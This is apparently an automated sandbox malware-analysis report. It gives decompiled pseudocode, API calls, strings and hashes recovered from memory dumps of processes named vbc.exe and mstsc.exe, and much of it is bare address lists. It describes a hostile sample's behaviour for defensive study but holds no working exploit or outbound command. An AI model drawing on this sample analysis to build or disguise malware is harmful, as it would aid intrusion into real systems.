0x008e2199
0x008e219d
0x008e21a0
0x008e21a2
0x008e21ce
0x008e21ce
0x008e21ce
0x008e21d0
0x008e21d6
0x008e21de
0x008e21e2
0x008e21e8
0x008e21e9
0x008e21ec
0x008e21f1
0x008e21f6
0x00000000
0x00000000
0x008e21f8
0x008e21fb
0x008e2206
0x008e220b
0x008e220c
0x008e2217
0x008e2226
0x008e222b
0x008e222c
0x008e222f
0x008e2232
0x008e2235
0x008e2235
0x008e223a
0x008e223f
0x008e2241
0x008e2243
0x008e2248
0x008e2248
0x008e224d
0x008e224f
0x008e2262
0x008e2263
0x008e2268
0x008e2269
0x008e2269
0x008e2269
0x008e226d
0x00000000
0x00000000
0x008e2276
0x008e2279
0x008e227e
0x008e2283
0x008e2287
0x008e228a
0x008e228d
0x008e228f
0x008e22bc
0x008e22bc
0x008e22bc
0x008e22be
0x008e22c4
0x008e22cc
0x008e22d0
0x008e22d6
0x008e22d7
0x008e22da
0x008e22df
0x008e22e4
0x00000000
0x00000000
0x008e22e6
0x008e22e9
0x008e22f4
0x008e22f9
0x008e22fa
0x008e2305
0x008e2314
0x008e2319
0x008e231a
0x008e231d
0x008e2320
0x008e2323
0x008e2323
0x008e2328
0x008e232d
0x008e232f
0x008e2331
0x008e2336
0x008e2336
0x008e233b
0x008e233d
0x008e2350
0x008e2351
0x008e2356
0x008e2359
0x008e2359
0x008e235b
0x008e235d
0x008a5367
0x008a536b
0x008a5372
0x00000000
0x00000000
0x00000000
0x00000000
0x008e2363
0x008e2363
0x008e2369
0x008e236a
0x008e236c
0x008e2371
0x008e2373
0x00000000
0x008e2379
0x008e2379
0x008e237a
0x008e237f
0x008e237f
0x008e2385
0x008e2386
0x008e2389
0x008e238e
0x008e2390
0x008a5378
0x008a537c
0x008e2396
0x008e2396
0x008e2397
0x008e239c
0x008e23a2
0x008e23a3
0x008e23a6
0x008e23ab
0x008e23ad
0x00000000
0x008e23b3
0x008e23b3
0x008e23b4
0x008e23b9
0x008e23ba
0x008e23ba
0x008e23bc
0x008e23bf
0x00000000
0x00000000
0x008d9153
0x008d9158
0x008d915a
0x008d915e
0x008d9160
0x00000000
0x008d9166
0x008d9166
0x008d9171
0x008d9176
0x008d9176
0x00000000
0x008d9160
0x008e23c6
0x008e23ce
0x008e23d7
0x008e23d7
0x008e23ad
0x008e2390
0x008e2373
0x008e233f
0x008e233f
0x00000000
0x008e233f
0x008e2291
0x008e2291
0x008e2293
0x008e2295
0x008e229a
0x008e22a1
0x008e22a3
0x008e22a7
0x008e22a9
0x00000000
0x00000000
0x008e22ab
0x008e22ad
0x008e22af
0x00000000
0x00000000
0x00000000
0x008e22af
0x008e22b1
0x008e22b4
0x008e22b4
0x008e22b6
0x008a53be
0x008a53be
0x008a53be
0x008a53c0
0x00000000
0x00000000
0x008a53cb
0x008a53ce
0x008a53d0
0x008a53d4
0x008a53d6
0x00000000
0x008a53d8
0x008a53e3
0x008a53ea
0x008a53ea
0x00000000
0x008a53d6
0x00000000
0x00000000
0x00000000
0x00000000
0x008e22b6
0x00000000
0x008e228f
0x008e2349
0x008e234d
0x008e2251
0x008e2251
0x00000000
0x008e2251
0x008e21a4
0x008e21a4
0x008e21a6
0x008e21a8
0x008e21ac
0x008e21b6
0x008e21b8
0x008e21bc
0x008e21be
0x00000000
0x00000000
0x008e21c0
0x008e21c2
0x008e21c4
0x00000000
0x00000000
0x00000000
0x008e21c4
0x008e21c6
0x008e21c6
0x008e21c8
0x00000000
0x00000000
0x00000000
0x00000000
0x008e21c8
0x008e21a2
0x00000000
0x008e2183
0x008c057b
0x008c057d
0x008c0581
0x008c0583
0x008e2178
0x00000000
0x008c0589
0x008c058f
0x008c058f
0x008c0583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E2206

Strings

RTL: Re-Waiting, xrefs: 008E223A, 008E2328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008E22FC
RTL: Resource at %p, xrefs: 008E221D, 008E230B
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 008E220E

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 6ece75c1fc82017da88f325dca87c8db0320a037a5ad45c8cb40a0f33bd57572
Instruction ID: 9370d6c57b9bafe922966190555a88ba70e3a807648f5901659822d51d1fe5d7
Opcode Fuzzy Hash: 6ece75c1fc82017da88f325dca87c8db0320a037a5ad45c8cb40a0f33bd57572
Instruction Fuzzy Hash: AC515971B002456BEB249B19CC82F6673ADFF85710F218269FD14DB385E931EC418BA1

Uniqueness

Uniqueness Score: -1.00%

Function 008C14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E008C14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x962088; // 0x74f6ce69
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = L008B7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E008C13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = L008B7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = L008B7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00882340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0088E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x008c14c0
0x008c14cb
0x008c14d2
0x008c14d6
0x008c14da
0x008c14de
0x008c14e3
0x008c157a
0x008c157a
0x008c14f1
0x008c14f3
0x008eea0f
0x00000000
0x008eea15
0x00000000
0x008eea15
0x008c14f9
0x008c14f9
0x008c14fe
0x008c1504
0x008eea1a
0x008eea1f
0x008eea21
0x008eea22
0x008eea27
0x008eea2a
0x008eea2a
0x008c1515
0x008c1517
0x008c156d
0x008c1572
0x008c1575
0x008c1575
0x008c151e
0x008eea50
0x008eea55
0x008eea58
0x008eea58
0x008c152e
0x008c1531
0x008c1533
0x00000000
0x008c1535
0x008c1541
0x008c1549
0x008c1549
0x008c1533
0x008c14f3
0x008c1559

APIs

___swprintf_l.LIBCMT ref: 008EEA22

Part of subcall function 008C13CB: ___swprintf_l.LIBCMT ref: 008C146B
Part of subcall function 008C13CB: ___swprintf_l.LIBCMT ref: 008C1490

___swprintf_l.LIBCMT ref: 008C156D

Strings

]:%u, xrefs: 008EEA47
%%%u, xrefs: 008C1564

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 4d0e69503c5c58f4b4a2447da1d7edf2f084c625ac885e37f0bfdc7ae825fe81
Instruction ID: 59f404ca7fc0b26f684ea4dc7bb352404320c3bd97eebb5d670a4339af528709
Opcode Fuzzy Hash: 4d0e69503c5c58f4b4a2447da1d7edf2f084c625ac885e37f0bfdc7ae825fe81
Instruction Fuzzy Hash: E72184729006199BCF21EE58CC85FEA73BCFB91704F544159F846D3241DB74EA588BD1

Uniqueness

Uniqueness Score: -1.00%

Function 008A53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E008A53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009601c0;
									_push(_t92);
									_push(0);
									_t37 = L0087F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = L008C4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									L008D3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									L008D3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0090217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L008D3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									L008C3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E008A5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = L0087F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											L008C3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = L0087F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												L008C3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = L0087F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = L008C3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E008A5329(_t74, _t92);
													_push(1);
													_t48 = E008A53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x008a53ab
0x008a53ae
0x008a53b1
0x008a53b4
0x008a53b7
0x008c05b6
0x008c05c0
0x008c05c3
0x00000000
0x008c05c9
0x008c05c9
0x008c05cc
0x008c05d5
0x008c05d5
0x008a53bd
0x008a53bd
0x008a53bd
0x008a53be
0x008a53be
0x008a53be
0x008a53c0
0x00000000
0x00000000
0x008e2269
0x008e226d
0x008e2349
0x008e234d
0x008e2273
0x008e2276
0x008e2279
0x008e227e
0x008e2283
0x008e2287
0x008e228a
0x008e228d
0x008e228f
0x008e22bc
0x008e22bc
0x008e22bc
0x008e22be
0x008e22c4
0x008e22cc
0x008e22d0
0x008e22d6
0x008e22d7
0x008e22da
0x008e22df
0x008e22e4
0x00000000
0x00000000
0x008e22e6
0x008e22e9
0x008e22f4
0x008e22f9
0x008e22fa
0x008e2305
0x008e2314
0x008e2319
0x008e231a
0x008e231d
0x008e2320
0x008e2323
0x008e2323
0x008e2328
0x008e232d
0x008e232f
0x008e2331
0x008e2336
0x008e2336
0x008e233b
0x008e233d
0x008e2350
0x008e2351
0x008e2356
0x008e2359
0x008e2359
0x008e235b
0x008e235d
0x008a5367
0x008a536b
0x008a5372
0x00000000
0x00000000
0x00000000
0x00000000
0x008e2363
0x008e2363
0x008e2369
0x008e236a
0x008e236c
0x008e2371
0x008e2373
0x00000000
0x008e2379
0x008e2379
0x008e237a
0x008e237f
0x008e237f
0x008e2385
0x008e2386
0x008e2389
0x008e238e
0x008e2390
0x008a5378
0x008a537c
0x008e2396
0x008e2396
0x008e2397
0x008e239c
0x008e23a2
0x008e23a3
0x008e23a6
0x008e23ab
0x008e23ad
0x00000000
0x008e23b3
0x008e23b3
0x008e23b4
0x008e23b9
0x008e23ba
0x008e23ba
0x008e23bc
0x008e23bf
0x00000000
0x00000000
0x008d9153
0x008d9158
0x008d915a
0x008d915e
0x008d9160
0x00000000
0x008d9166
0x008d9166
0x008d9171
0x008d9176
0x008d9176
0x00000000
0x008d9160
0x008e23c6
0x008e23cb
0x008e23ce
0x008e23d7
0x008e23d7
0x008e23ad
0x008e2390
0x008e2373
0x008e233f
0x008e233f
0x00000000
0x008e233f
0x008e2291
0x008e2291
0x008e2293
0x008e2295
0x008e229a
0x008e22a1
0x008e22a3
0x008e22a7
0x008e22a9
0x00000000
0x00000000
0x008e22ab
0x008e22ad
0x008e22af
0x00000000
0x00000000
0x00000000
0x008e22af
0x008e22b1
0x008e22b4
0x008e22b4
0x008e22b6
0x00000000
0x00000000
0x00000000
0x00000000
0x008e22b6
0x008e228f
0x00000000
0x008e226d
0x008a53cb
0x008a53ce
0x008a53d0
0x008a53d4
0x008a53d6
0x00000000
0x008a53d8
0x008a53e3
0x008a53ea
0x008a53ea
0x008a53d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E22F4

Strings

RTL: Re-Waiting, xrefs: 008E2328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008E22FC
RTL: Resource at %p, xrefs: 008E230B

Memory Dump Source

Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true

Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_860000_vbc.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 75bb36dca9921d5b358113db27abea90da5bb5ca019774f7dcbdcefa8bff5a76
Instruction ID: 2ca0ade7d821966cbdedf6cd2ddefee1e062d6349907fe140793985e9ff74962
Opcode Fuzzy Hash: 75bb36dca9921d5b358113db27abea90da5bb5ca019774f7dcbdcefa8bff5a76
Instruction Fuzzy Hash: 1F5128716006056BEF11DB29CC81FA673ACFF96360F104229FD18DB781EA71EC818BA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mstsc.exePID: 172, Parent PID: 1860COMMON

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	3.2%
Signature Coverage:	1.3%
Total number of Nodes:	758
Total number of Limit Nodes:	98

Executed Functions

Function 000D33C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000,00000000,000C3D06,00000000), ref: 000D33D7
CoCreateInstance.OLE32(?,00000000,00000001,?,?), ref: 000D3423
OleUninitialize.OLE32 ref: 000D34BE

Strings

@J7<, xrefs: 000D33EB

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: @J7<
API String ID: 948891078-2016760708
Opcode ID: 8bd81b321109a2155e045c751a242a522052c9b934456cc777292468902f298c
Instruction ID: e2d313be4bbda2283281b2c580389e2b3d6ea8c461f4f56b7991287926620eb8
Opcode Fuzzy Hash: 8bd81b321109a2155e045c751a242a522052c9b934456cc777292468902f298c
Instruction Fuzzy Hash: A3311CB5A0070AAFDB00DFD8C8809EFB7B9BF88304B108559E515AB314D775EE058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 000D1660 Relevance: 4.6, APIs: 3, Instructions: 101
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNEL32(?,00000000), ref: 000D172F
FindNextFileW.KERNEL32(?,00000010), ref: 000D176E
FindClose.KERNEL32(?), ref: 000D1779

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 151f3c0cb29038064a7b48d86c683f9cbf391c3b50f36f14df04ac2ae8c7f5dd
Instruction ID: af674d1e492f9c2779b05984a18d1d3b43338d9b140753a9c742a029da8b3fda
Opcode Fuzzy Hash: 151f3c0cb29038064a7b48d86c683f9cbf391c3b50f36f14df04ac2ae8c7f5dd
Instruction Fuzzy Hash: 6031B675900319BBDB60DF64CC85FEF77BCAF44705F104559B90966291DBB0AA84CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000DA310 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000005,00000000,000D5807,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,000D5807,00000000,00000005,00000060,00000000,00000000), ref: 000DA35D

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
Instruction ID: da3d3df29fd984b8037af6979a24edade33196fd64a9f549334aa001e7459a8c
Opcode Fuzzy Hash: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
Instruction Fuzzy Hash: 5CF0BDB2200208AFCB08CF88DC85EEB37ADEF8C754F118248BA0997241C630F8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 000DA3C0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(000D59C2,5DA515B3,FFFFFFFF,000D5681,00000206,?,000D59C2,00000206,000D5681,FFFFFFFF,5DA515B3,000D59C2,00000206,00000000), ref: 000DA405

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
Instruction ID: e73262ca375c0ff610655b1f0b202fd955da8ab4b36c52848dc5a7a14fd7ac9c
Opcode Fuzzy Hash: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
Instruction Fuzzy Hash: D5F0A4B2200208ABCB14DF99DC85EEB77ADEF8C754F158259BA0D97241D630E811CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 000DA4F0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000C2D11,00002000,00003000,00000004), ref: 000DA529

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
Instruction ID: 609e413d0085b32fcea70b415c988fb869e5d6aa4e9af4255036947eca0f9c0e
Opcode Fuzzy Hash: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
Instruction Fuzzy Hash: 85F015B2210208ABDB14DF89DC81EEB77ADEF8C754F118159BE0897241C630F810CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 000DA440 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(000D59A0,00000206,?,000D59A0,00000005,FFFFFFFF), ref: 000DA465

Memory Dump Source

Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
Instruction ID: 81a34db36c881d1bcf8106edddb350d23a71249db4e54bfc3c97c4aeaa9b6994
Opcode Fuzzy Hash: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
Instruction Fuzzy Hash: 91D01772200218ABD620EB98DC89ED77BACDF49A60F1180A5BA485B242C530FA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 025C0078 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025C0086

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 025C00C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 025C00CF

Memory Dump Source

Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
